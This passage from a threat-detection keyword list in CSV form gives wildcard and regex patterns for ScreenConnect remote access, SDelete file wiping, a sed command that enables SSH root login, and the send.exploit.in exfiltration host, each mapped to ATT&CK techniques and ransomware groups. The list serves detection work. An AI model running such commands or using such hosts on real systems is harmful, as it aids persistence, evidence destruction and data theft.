SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect Client (*",".{0,1000}\\ScreenConnect\sClient\s\(.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.Client.exe*",".{0,1000}\\ScreenConnect\.Client\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.ClientService.exe*",".{0,1000}\\ScreenConnect\.ClientService\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.ClientSetup.exe*",".{0,1000}\\ScreenConnect\.ClientSetup\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - 
Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.Core.dll*",".{0,1000}\\ScreenConnect\.Core\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.InstallerActions.dll*",".{0,1000}\\ScreenConnect\.InstallerActions\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.Windows.dll*",".{0,1000}\\ScreenConnect\.Windows\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.WindowsBackstageShell.exe*",".{0,1000}\\ScreenConnect\.WindowsBackstageShell\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat 
actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect.WindowsClient.exe*",".{0,1000}\\ScreenConnect\.WindowsClient\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ScreenConnect\Bin\*",".{0,1000}\\ScreenConnect\\Bin\\.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\TEMP\ScreenConnect\*.ps1*",".{0,1000}\\TEMP\\ScreenConnect\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\Temp\ScreenConnect\*\setup.msi*",".{0,1000}\\Temp\\ScreenConnect\\.{0,1000}\\setup\.msi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Windows\Temp\ScreenConnect\*.cmd*",".{0,1000}\\Windows\\Temp\\ScreenConnect\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Windows\Temp\ScreenConnect\*.ps1*",".{0,1000}\\Windows\\Temp\\ScreenConnect\\.{0,1000}\.ps1.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect Software*",".{0,1000}\ScreenConnect\sSoftware\<\/Data\>.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD 
SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd.exe*\TEMP\ScreenConnect\*.cmd*",".{0,1000}cmd\.exe.{0,1000}\\TEMP\\ScreenConnect\\.{0,1000}\.cmd.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.screenconnect.com/Bin/*.exe*",".{0,1000}https\:\/\/.{0,1000}\.screenconnect\.com\/Bin\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater 
","RMM","screenconnect.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.screenconnect.com/Host*",".{0,1000}https\:\/\/.{0,1000}\.screenconnect\.com\/Host.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://cloud.screenconnect.com/#/trialtoinstance?cookieValue=*",".{0,1000}https\:\/\/cloud\.screenconnect\.com\/\#\/trialtoinstance\?cookieValue\=.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\ScreenConnect Client*",".{0,1000}Program\sFiles\s\(x86\)\\ScreenConnect\sClient.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*-relay.screenconnect.com*",".{0,1000}\-relay\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - 
TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect Software*",".{0,1000}ScreenConnect\sSoftware.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.Client.dll*",".{0,1000}ScreenConnect\.Client\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.Client.exe.jar*",".{0,1000}ScreenConnect\.Client\.exe\.jar.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.ClientService.dll*",".{0,1000}ScreenConnect\.ClientService\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote 
desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.ClientService.exe*",".{0,1000}ScreenConnect\.ClientService\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.ClientSetup.exe*",".{0,1000}ScreenConnect\.ClientSetup\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SCREENCONNECT.CLIENTSETUP.EXE-*.pf*",".{0,1000}SCREENCONNECT\.CLIENTSETUP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*ScreenConnect.ClientUninstall.vbs*",".{0,1000}ScreenConnect\.ClientUninstall\.vbs.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.Core.pdb*",".{0,1000}ScreenConnect\.Core\.pdb.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.Server.dll*",".{0,1000}ScreenConnect\.Server\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.Service.exe*",".{0,1000}ScreenConnect\.Service\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater 
","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SCREENCONNECT.SERVICE.EXE-*.pf*",".{0,1000}SCREENCONNECT\.SERVICE\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.WindowsBackstageShell.exe*",".{0,1000}ScreenConnect\.WindowsBackstageShell\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SCREENCONNECT.WINDOWSCLIENT.*.pf*",".{0,1000}SCREENCONNECT\.WINDOWSCLIENT\..{0,1000}\.pf.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.WindowsClient.exe*",".{0,1000}ScreenConnect\.WindowsClient\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect.WindowsInstaller.dll*",".{0,1000}ScreenConnect\.WindowsInstaller\.dll.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect_*_Release.msi*",".{0,1000}ScreenConnect_.{0,1000}_Release\.msi.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect_*_Release.tar.gz*",".{0,1000}ScreenConnect_.{0,1000}_Release\.tar\.gz.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnect_*_Release.zip*",".{0,1000}ScreenConnect_.{0,1000}_Release\.zip.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as 
Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ScreenConnectClientNetworkDeployer.exe*",".{0,1000}ScreenConnectClientNetworkDeployer\.exe.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*server*-relay.screenconnect.com*",".{0,1000}server.{0,1000}\-relay\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","screenconnect.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*-web.screenconnect.com*",".{0,1000}\-web\.screenconnect\.com.{0,1000}","greyware_tool_keyword","ScreenConnect","ConnectWise Control formerly known as Screenconnect is a remote desktop software application.","T1021.001 - T1133","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - BlackCat - LockBit - Scattered Spider* - Hive - Trigona - Medusa - Yanluowang - GOLD SOUTHFIELD - MuddyWater ","RMM","https://screenconnect.connectwise.com/download","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/sdelete.exe*",".{0,1000}\/sdelete\.exe.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an 
application that securely deletes data in a way that makes it unrecoverable - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*/SDelete.zip*",".{0,1000}\/SDelete\.zip.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an application that securely deletes data in a way that makes it unrecoverable - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*/sdelete64.exe*",".{0,1000}\/sdelete64\.exe.{0,1000}","greyware_tool_keyword","sdelete","SDelete is an application that securely deletes data in a way that makes it unrecoverable - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*/sdelete64a.exe*",".{0,1000}\/sdelete64a\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\sdelete.exe*",".{0,1000}\\sdelete\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense 
Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\SDelete.zip*",".{0,1000}\\SDelete\.zip.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\sdelete64.exe*",".{0,1000}\\sdelete64\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\sdelete64a.exe*",".{0,1000}\\sdelete64a\.exe.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\Software\Sysinternals\Sdelete*",".{0,1000}\\Software\\Sysinternals\\Sdelete.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*>sdelete.exe<*",".{0,1000}\>sdelete\.exe\<.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or 
directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*>sysinternals sdelete<*",".{0,1000}\>sysinternals\ssdelete\<.{0,1000}","greyware_tool_keyword","sdelete","delete one or more files and/or directories, or to cleanse the free space on a logical disk - abused by attackers","T1485 - T1070.004","TA0005 - TA0040 ","N/A","APT29 - Cobalt Group - FIN5 - Silence","Defense Evasion","https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*",".{0,1000}sed\s\'s\/\#PermitRootLogin\sprohibit\-password\/PermitRootLogin\sYes\'\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*/send.exploit.in/*",".{0,1000}\/send\.exploit\.in\/.{0,1000}","greyware_tool_keyword","send.exploit.in","file-sharing platform used by ransomware groups","T1567","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* 